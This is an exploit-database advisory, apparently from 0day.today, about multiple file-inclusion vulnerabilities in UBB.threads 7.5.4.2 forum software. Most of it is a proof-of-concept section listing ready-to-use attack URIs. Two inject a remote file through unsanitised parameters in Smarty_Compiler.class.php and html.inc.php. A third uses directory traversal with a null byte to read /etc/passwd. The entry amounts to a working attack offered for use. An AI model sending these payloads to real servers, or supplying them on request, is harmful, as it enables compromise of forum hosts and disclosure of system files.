id: 10082
date: 12/04/2009
title: UBB.threads 7.5.4 2 Multiple File Inclusion Vulnerabilities
author: R3VAN_BASTARD
cves: 

===========================================================
UBB.threads 7.5.4 2 Multiple File Inclusion Vulnerabilities
===========================================================

UBBCentral: http://www.ubbcentral.com/
 
UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
 
UBB.threads 7.5.4.2 is vulnerable; other versions may also be affected.
 
POC:
An attacker can exploit these issues via a browser.
 
The following example URIs are available:
 
http://server/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI]
http://server/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI]
http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00 


#  0day.today [2023-03-26]  #